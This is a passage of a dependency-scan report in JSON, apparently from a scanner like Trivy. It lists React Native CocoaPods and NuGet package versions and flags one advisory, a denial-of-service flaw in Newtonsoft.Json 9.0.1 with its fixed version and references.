"React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTSettingsHeaders@0.63.2", "Name": "React-Core/RCTSettingsHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTSettingsHeaders", "UID": "7eedfdaaa2df2537" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTTextHeaders@0.63.2", "Name": "React-Core/RCTTextHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTTextHeaders", "UID": "e0da0248e08b321f" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTVibrationHeaders@0.63.2", "Name": "React-Core/RCTVibrationHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTVibrationHeaders", "UID": "72bcb6ac811b33b1" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTWebSocket@0.63.2", "Name": "React-Core/RCTWebSocket", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTWebSocket", "UID": "6afdba3257424d21" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-CoreModules@0.63.2", "Name": "React-CoreModules", "Identifier": { "PURL": "pkg:cocoapods/React-CoreModules@0.63.2", "UID": "6dc88cbd1aa42d05" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "RCTTypeSafety@0.63.2", "React-Core/CoreModulesHeaders@0.63.2", "React-jsi@0.63.2", "React-RCTImage@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTActionSheet@0.63.2", "Name": "React-RCTActionSheet", "Identifier": { "PURL": "pkg:cocoapods/React-RCTActionSheet@0.63.2", "UID": "c61b3dbf7a446ec0" }, "Version": "0.63.2", "DependsOn": [ "React-Core/RCTActionSheetHeaders@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTAnimation@0.63.2", "Name": "React-RCTAnimation", "Identifier": { "PURL": "pkg:cocoapods/React-RCTAnimation@0.63.2", "UID": "3240f64ffd6189c3" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "RCTTypeSafety@0.63.2", "React-Core/RCTAnimationHeaders@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTBlob@0.63.2", "Name": "React-RCTBlob", "Identifier": { "PURL": "pkg:cocoapods/React-RCTBlob@0.63.2", "UID": "47360f16457ad0e1" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "React-Core/RCTBlobHeaders@0.63.2", "React-Core/RCTWebSocket@0.63.2", "React-jsi@0.63.2", "React-RCTNetwork@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTImage@0.63.2", "Name": "React-RCTImage", "Identifier": { "PURL": "pkg:cocoapods/React-RCTImage@0.63.2", "UID": "adf3d311ddc64c68" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "RCTTypeSafety@0.63.2", "React-Core/RCTImageHeaders@0.63.2", "React-jsi@0.63.2", "React-RCTNetwork@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTLinking@0.63.2", "Name": "React-RCTLinking", "Identifier": { "PURL": "pkg:cocoapods/React-RCTLinking@0.63.2", "UID": "f5d586619ab3c803" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "React-Core/RCTLinkingHeaders@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTNetwork@0.63.2", "Name": "React-RCTNetwork", "Identifier": { "PURL": "pkg:cocoapods/React-RCTNetwork@0.63.2", "UID": "b4e740d97ec5d08f" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "RCTTypeSafety@0.63.2", "React-Core/RCTNetworkHeaders@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTSettings@0.63.2", "Name": "React-RCTSettings", "Identifier": { "PURL": "pkg:cocoapods/React-RCTSettings@0.63.2", "UID": "e98a9a68771cecf4" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "RCTTypeSafety@0.63.2", "React-Core/RCTSettingsHeaders@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTText@0.63.2", "Name": "React-RCTText", "Identifier": { "PURL": "pkg:cocoapods/React-RCTText@0.63.2", "UID": "ebe1fcb12cc97255" }, "Version": "0.63.2", "DependsOn": [ "React-Core/RCTTextHeaders@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-RCTVibration@0.63.2", "Name": "React-RCTVibration", "Identifier": { "PURL": "pkg:cocoapods/React-RCTVibration@0.63.2", "UID": "424335fbb9703beb" }, "Version": "0.63.2", "DependsOn": [ "FBReactNativeSpec@0.63.2", "Folly@2020.01.13.00", "React-Core/RCTVibrationHeaders@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-callinvoker@0.63.2", "Name": "React-callinvoker", "Identifier": { "PURL": "pkg:cocoapods/React-callinvoker@0.63.2", "UID": "683337d0114c2aa4" }, "Version": "0.63.2", "AnalyzedBy": "cocoapods" }, { "ID": "React-cxxreact@0.63.2", "Name": "React-cxxreact", "Identifier": { "PURL": "pkg:cocoapods/React-cxxreact@0.63.2", "UID": "2c32cd831f02ea78" }, "Version": "0.63.2", "DependsOn": [ "boost-for-react-native@1.63.0", "DoubleConversion@1.1.6", "Folly@2020.01.13.00", "glog@0.3.5", "React-callinvoker@0.63.2", "React-jsinspector@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-jsi@0.63.2", "Name": "React-jsi", "Identifier": { "PURL": "pkg:cocoapods/React-jsi@0.63.2", "UID": "7b4d29c853ce2ede" }, "Version": "0.63.2", "DependsOn": [ "boost-for-react-native@1.63.0", "DoubleConversion@1.1.6", "Folly@2020.01.13.00", "glog@0.3.5", "React-jsi/Default@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-jsi/Default@0.63.2", "Name": "React-jsi/Default", "Identifier": { "PURL": "pkg:cocoapods/React-jsi@0.63.2#Default", "UID": "7c693ebeea46d71" }, "Version": "0.63.2", "DependsOn": [ "boost-for-react-native@1.63.0", "DoubleConversion@1.1.6", "Folly@2020.01.13.00", "glog@0.3.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-jsiexecutor@0.63.2", "Name": "React-jsiexecutor", "Identifier": { "PURL": "pkg:cocoapods/React-jsiexecutor@0.63.2", "UID": "f993bdb5ff7953ba" }, "Version": "0.63.2", "DependsOn": [ "DoubleConversion@1.1.6", "Folly@2020.01.13.00", "glog@0.3.5", "React-cxxreact@0.63.2", "React-jsi@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-jsinspector@0.63.2", "Name": "React-jsinspector", "Identifier": { "PURL": "pkg:cocoapods/React-jsinspector@0.63.2", "UID": "7f254dc14fb4772f" }, "Version": "0.63.2", "AnalyzedBy": "cocoapods" }, { "ID": "ReactCommon/turbomodule/core@0.63.2", "Name": "ReactCommon/turbomodule/core", "Identifier": { "PURL": "pkg:cocoapods/ReactCommon@0.63.2#turbomodule/core", "UID": "9a8a36ade2d7dd83" }, "Version": "0.63.2", "DependsOn": [ "DoubleConversion@1.1.6", "Folly@2020.01.13.00", "glog@0.3.5", "React-callinvoker@0.63.2", "React-Core@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "Yoga@1.14.0", "Name": "Yoga", "Identifier": { "PURL": "pkg:cocoapods/Yoga@1.14.0", "UID": "e4deb58e73a7e2be" }, "Version": "1.14.0", "AnalyzedBy": "cocoapods" }, { "ID": "YogaKit@1.18.1", "Name": "YogaKit", "Identifier": { "PURL": "pkg:cocoapods/YogaKit@1.18.1", "UID": "8b22a4431a699b19" }, "Version": "1.18.1", "DependsOn": [ "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "boost-for-react-native@1.63.0", "Name": "boost-for-react-native", "Identifier": { "PURL": "pkg:cocoapods/boost-for-react-native@1.63.0", "UID": "a6b42c74fe63bad" }, "Version": "1.63.0", "AnalyzedBy": "cocoapods" }, { "ID": "glog@0.3.5", "Name": "glog", "Identifier": { "PURL": "pkg:cocoapods/glog@0.3.5", "UID": "b544635d078bf508" }, "Version": "0.3.5", "AnalyzedBy": "cocoapods" }, { "ID": "react-native-orientation-locker@1.2.0", "Name": "react-native-orientation-locker", "Identifier": { "PURL": "pkg:cocoapods/react-native-orientation-locker@1.2.0", "UID": "e6d13f501dbb0ac9" }, "Version": "1.2.0", "DependsOn": [ "React@0.63.2" ], "AnalyzedBy": "cocoapods" } ] }, { "Target": "node_modules/react-native-orientation-locker/example/windows/example/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.UI.Xaml", "Identifier": { "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.3.191129002", "UID": "c82075e21a681434" }, "Version": "2.3.191129002", "AnalyzedBy": "nuget" }, { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200615.7", "UID": "e8bb3a806533ad04" }, "Version": "2.0.200615.7", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-orientation-locker/windows/OrientationWindows/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "80c98c31ab67824b" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-permissions/windows/RNPermissions/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", "UID": "e1ab3ec43d9746e5" }, "Version": "2.0.210312.4", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-permissions/windows/RNPermissions/packages.lock.json", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "ID": "Microsoft.ReactNative@0.77.2-Fabric", "Name": "Microsoft.ReactNative", "Identifier": { "PURL": "pkg:nuget/Microsoft.ReactNative@0.77.2-Fabric", "UID": "30bfecde8cac2575" }, "Version": "0.77.2-Fabric", "Relationship": "direct", "Locations": [ { "StartLine": 11, "EndLine": 16 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.ReactNative.Cxx@0.77.2-Fabric", "Name": "Microsoft.ReactNative.Cxx", "Identifier": { "PURL": "pkg:nuget/Microsoft.ReactNative.Cxx@0.77.2-Fabric", "UID": "10d8c94b85e3213f" }, "Version": "0.77.2-Fabric", "Relationship": "direct", "DependsOn": [ "Microsoft.ReactNative@0.77.2-Fabric" ], "Locations": [ { "StartLine": 17, "EndLine": 25 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.VCRTForwarders.140@1.0.2-rc", "Name": "Microsoft.VCRTForwarders.140", "Identifier": { "PURL": "pkg:nuget/Microsoft.VCRTForwarders.140@1.0.2-rc", "UID": "d405285e704ff195" }, "Version": "1.0.2-rc", "Relationship": "direct", "Locations": [ { "StartLine": 26, "EndLine": 31 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", "UID": "a2c3b91d9e220db5" }, "Version": "2.0.230706.1", "Relationship": "direct", "Locations": [ { "StartLine": 32, "EndLine": 37 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.WindowsAppSDK@1.6.240923002", "Name": "Microsoft.WindowsAppSDK", "Identifier": { "PURL": "pkg:nuget/Microsoft.WindowsAppSDK@1.6.240923002", "UID": "90d07bb0df0ada85" }, "Version": "1.6.240923002", "Relationship": "direct", "DependsOn": [ "Microsoft.Web.WebView2@1.0.2651.64", "Microsoft.Windows.SDK.BuildTools@10.0.22621.756" ], "Locations": [ { "StartLine": 38, "EndLine": 47 } ], "AnalyzedBy": "nuget" }, { "ID": "boost@1.83.0", "Name": "boost", "Identifier": { "PURL": "pkg:nuget/boost@1.83.0", "UID": "4c2cda67df70e53c" }, "Version": "1.83.0", "Relationship": "direct", "Locations": [ { "StartLine": 5, "EndLine": 10 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Web.WebView2@1.0.2651.64", "Name": "Microsoft.Web.WebView2", "Identifier": { "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.2651.64", "UID": "1336c9ffa1113424" }, "Version": "1.0.2651.64", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 48, "EndLine": 52 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.SDK.BuildTools@10.0.22621.756", "Name": "Microsoft.Windows.SDK.BuildTools", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.SDK.BuildTools@10.0.22621.756", "UID": "e062627999c8cf72" }, "Version": "10.0.22621.756", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 53, "EndLine": 57 } ], "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-screens/windows/RNScreens/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "c5acc4a62c55de3f" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-share/windows/ReactNativeShare/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.UI.Xaml", "Identifier": { "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.6.0", "UID": "7b2ee6818925265f" }, "Version": "2.6.0", "AnalyzedBy": "nuget" }, { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", "UID": "51a75388bdaa952b" }, "Version": "2.0.210312.4", "AnalyzedBy": "nuget" }, { "Name": "ReactNative.Hermes.Windows", "Identifier": { "PURL": "pkg:nuget/ReactNative.Hermes.Windows@0.9.0-ms.4", "UID": "5e9324cdc5e49a87" }, "Version": "0.9.0-ms.4", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-sqlite-2/windows/RNSqlite2.Net46/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Data.Sqlite", "Identifier": { "PURL": "pkg:nuget/Microsoft.Data.Sqlite@1.1.1", "UID": "f77351c79af72703" }, "Version": "1.1.1", "AnalyzedBy": "nuget" }, { "Name": "Microsoft.NETCore.Platforms", "Identifier": { "PURL": "pkg:nuget/Microsoft.NETCore.Platforms@1.1.0", "UID": "5d888ff16c996253" }, "Version": "1.1.0", "AnalyzedBy": "nuget" }, { "Name": "Microsoft.Win32.Primitives", "Identifier": { "PURL": "pkg:nuget/Microsoft.Win32.Primitives@4.3.0", "UID": "bad82a9f90419a79" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "NETStandard.Library", "Identifier": { "PURL": "pkg:nuget/NETStandard.Library@1.6.1", "UID": "5fbbc8a01fb79e79" }, "Version": "1.6.1", "AnalyzedBy": "nuget" }, { "Name": "Newtonsoft.Json", "Identifier": { "PURL": "pkg:nuget/Newtonsoft.Json@9.0.1", "UID": "4621b56ba40433" }, "Version": "9.0.1", "AnalyzedBy": "nuget" }, { "Name": "PCLStorage", "Identifier": { "PURL": "pkg:nuget/PCLStorage@1.0.2", "UID": "9136bb7d86371a1a" }, "Version": "1.0.2", "AnalyzedBy": "nuget" }, { "Name": "SQLite", "Identifier": { "PURL": "pkg:nuget/SQLite@3.13.0", "UID": "893d510c78f94575" }, "Version": "3.13.0", "AnalyzedBy": "nuget" }, { "Name": "System.AppContext", "Identifier": { "PURL": "pkg:nuget/System.AppContext@4.3.0", "UID": "c61166235bea8069" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Collections", "Identifier": { "PURL": "pkg:nuget/System.Collections@4.3.0", "UID": "39ab242c8f81cb35" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Collections.Concurrent", "Identifier": { "PURL": "pkg:nuget/System.Collections.Concurrent@4.3.0", "UID": "e123329e24fc173e" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Console", "Identifier": { "PURL": "pkg:nuget/System.Console@4.3.0", "UID": "135fefd87ca87a97" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Diagnostics.Debug", "Identifier": { "PURL": "pkg:nuget/System.Diagnostics.Debug@4.3.0", "UID": "a0703e040eef1a25" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Diagnostics.DiagnosticSource", "Identifier": { "PURL": "pkg:nuget/System.Diagnostics.DiagnosticSource@4.3.0", "UID": "102a25ae3152241d" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Diagnostics.Tools", "Identifier": { "PURL": "pkg:nuget/System.Diagnostics.Tools@4.3.0", "UID": "c908cb4ac905111e" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Diagnostics.Tracing", "Identifier": { "PURL": "pkg:nuget/System.Diagnostics.Tracing@4.3.0", "UID": "7d0b5d23411fbba6" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Globalization", "Identifier": { "PURL": "pkg:nuget/System.Globalization@4.3.0", "UID": "b2ab88e303266347" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Globalization.Calendars", "Identifier": { "PURL": "pkg:nuget/System.Globalization.Calendars@4.3.0", "UID": "5f6d78e6cde36564" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.IO", "Identifier": { "PURL": "pkg:nuget/System.IO@4.3.0", "UID": "7bb2a00a6ec12a6d" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.IO.Compression", "Identifier": { "PURL": "pkg:nuget/System.IO.Compression@4.3.0", "UID": "6cfe6309e55d4ffc" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.IO.Compression.ZipFile", "Identifier": { "PURL": "pkg:nuget/System.IO.Compression.ZipFile@4.3.0", "UID": "ad1b71fdec5403a0" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.IO.FileSystem", "Identifier": { "PURL": "pkg:nuget/System.IO.FileSystem@4.3.0", "UID": "d9b29f0a5739c33" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.IO.FileSystem.Primitives", "Identifier": { "PURL": "pkg:nuget/System.IO.FileSystem.Primitives@4.3.0", "UID": "be005a28a479641f" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Linq", "Identifier": { "PURL": "pkg:nuget/System.Linq@4.3.0", "UID": "d3535abbda091b93" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Linq.Expressions", "Identifier": { "PURL": "pkg:nuget/System.Linq.Expressions@4.3.0", "UID": "97cad8a075602de1" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Net.Http", "Identifier": { "PURL": "pkg:nuget/System.Net.Http@4.3.4", "UID": "83784403350659a4" }, "Version": "4.3.4", "AnalyzedBy": "nuget" }, { "Name": "System.Net.Primitives", "Identifier": { "PURL": "pkg:nuget/System.Net.Primitives@4.3.0", "UID": "668c5d24897af98" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Net.Sockets", "Identifier": { "PURL": "pkg:nuget/System.Net.Sockets@4.3.0", "UID": "d8bda2219253a0b1" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.ObjectModel", "Identifier": { "PURL": "pkg:nuget/System.ObjectModel@4.3.0", "UID": "105338e28706b33a" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Reflection", "Identifier": { "PURL": "pkg:nuget/System.Reflection@4.3.0", "UID": "fff9e418a8d7768a" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Reflection.Extensions", "Identifier": { "PURL": "pkg:nuget/System.Reflection.Extensions@4.3.0", "UID": "24a70c725f0072c3" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Reflection.Primitives", "Identifier": { "PURL": "pkg:nuget/System.Reflection.Primitives@4.3.0", "UID": "612588b9f47e0a3c" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Resources.ResourceManager", "Identifier": { "PURL": "pkg:nuget/System.Resources.ResourceManager@4.3.0", "UID": "7bb72475985ce0c4" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime", "Identifier": { "PURL": "pkg:nuget/System.Runtime@4.3.0", "UID": "eb21e14a34b26aa4" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime.Extensions", "Identifier": { "PURL": "pkg:nuget/System.Runtime.Extensions@4.3.0", "UID": "29a65e57fce0b6c9" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime.Handles", "Identifier": { "PURL": "pkg:nuget/System.Runtime.Handles@4.3.0", "UID": "444f2f86988ecfe9" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime.InteropServices", "Identifier": { "PURL": "pkg:nuget/System.Runtime.InteropServices@4.3.0", "UID": "2393e22d59f279a9" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime.InteropServices.RuntimeInformation", "Identifier": { "PURL": "pkg:nuget/System.Runtime.InteropServices.RuntimeInformation@4.3.0", "UID": "e865ccf21a190b08" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Runtime.Numerics", "Identifier": { "PURL": "pkg:nuget/System.Runtime.Numerics@4.3.0", "UID": "71ad4b33ad6eb4c9" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Security.Cryptography.Algorithms", "Identifier": { "PURL": "pkg:nuget/System.Security.Cryptography.Algorithms@4.3.0", "UID": "8b67e421a2d3394" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Security.Cryptography.Encoding", "Identifier": { "PURL": "pkg:nuget/System.Security.Cryptography.Encoding@4.3.0", "UID": "906e3a52116c363c" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Security.Cryptography.Primitives", "Identifier": { "PURL": "pkg:nuget/System.Security.Cryptography.Primitives@4.3.0", "UID": "f58a70acebaa0392" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Security.Cryptography.X509Certificates", "Identifier": { "PURL": "pkg:nuget/System.Security.Cryptography.X509Certificates@4.3.0", "UID": "bd45ae8383a1c3c2" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Text.Encoding", "Identifier": { "PURL": "pkg:nuget/System.Text.Encoding@4.3.0", "UID": "9b775c5e4db674d8" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Text.Encoding.Extensions", "Identifier": { "PURL": "pkg:nuget/System.Text.Encoding.Extensions@4.3.0", "UID": "e59977bcf61f3d4b" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Text.RegularExpressions", "Identifier": { "PURL": "pkg:nuget/System.Text.RegularExpressions@4.3.1", "UID": "6e09f07e852981c" }, "Version": "4.3.1", "AnalyzedBy": "nuget" }, { "Name": "System.Threading", "Identifier": { "PURL": "pkg:nuget/System.Threading@4.3.0", "UID": "d5978c61633ebb9a" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Threading.Tasks", "Identifier": { "PURL": "pkg:nuget/System.Threading.Tasks@4.3.0", "UID": "b8cc3d29decabb7a" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Threading.Timer", "Identifier": { "PURL": "pkg:nuget/System.Threading.Timer@4.3.0", "UID": "d05049714aa3253a" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Xml.ReaderWriter", "Identifier": { "PURL": "pkg:nuget/System.Xml.ReaderWriter@4.3.0", "UID": "4edf4892edf9b5a8" }, "Version": "4.3.0", "AnalyzedBy": "nuget" }, { "Name": "System.Xml.XDocument", "Identifier": { "PURL": "pkg:nuget/System.Xml.XDocument@4.3.0", "UID": "ca14b6de031c68bd" }, "Version": "4.3.0", "AnalyzedBy": "nuget" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2024-21907", "VendorIDs": [ "GHSA-5crp-9r3c-p9vr" ], "PkgName": "Newtonsoft.Json", "PkgIdentifier": { "PURL": "pkg:nuget/Newtonsoft.Json@9.0.1", "UID": "4621b56ba40433" }, "InstalledVersion": "9.0.1", "FixedVersion": "13.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-21907", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory NuGet", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anuget" }, "Fingerprint": "sha256:83b18238a577491bc73c58189090605c8b987b84c49cb989e11a215ff5653ea1", "Title": "Improper Handling of Exceptional Conditions in Newtonsoft.Json", "Description": "Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.", "Severity": "HIGH", "CweIDs": [ "CWE-755" ], "VendorSeverity": { "ghsa": 3, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://alephsecurity.com/2018/10/22/StackOverflowException", "https://alephsecurity.com/2018/10/22/StackOverflowException/", "https://alephsecurity.com/vulns/aleph-2018004", "https://github.com/JamesNK/Newtonsoft.Json", "https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66", "https://github.com/JamesNK/Newtonsoft.Json/issues/2457", "https://github.com/JamesNK/Newtonsoft.Json/pull/2462", "https://github.com/advisories/GHSA-5crp-9r3c-p9vr", "https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678", "https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr" ], "PublishedDate": "2024-01-03T16:15:08.793Z", "LastModifiedDate": "2025-11-28T23:15:47.937Z" } ] }, { "Target": "node_modules/react-native-svg/windows/RNSVG/packages.lock.json", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "ID": "Microsoft.UI.Xaml@2.8.0", "Name": "Microsoft.UI.Xaml", "Identifier": { "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.8.0", "UID": "66a2e80f259365b2" }, "Version": "2.8.0", "Relationship": "direct", "DependsOn": [ "Microsoft.Web.WebView2@1.0.1264.42" ], "Locations": [ { "StartLine": 5, "EndLine": 13 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", "UID": "347a26671a6b7b33" }, "Version": "2.0.230706.1", "Relationship": "direct", "Locations": [ { "StartLine": 14, "EndLine": 19 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.JavaScript.Hermes@0.1.23", "Name": "Microsoft.JavaScript.Hermes", "Identifier": { "PURL": 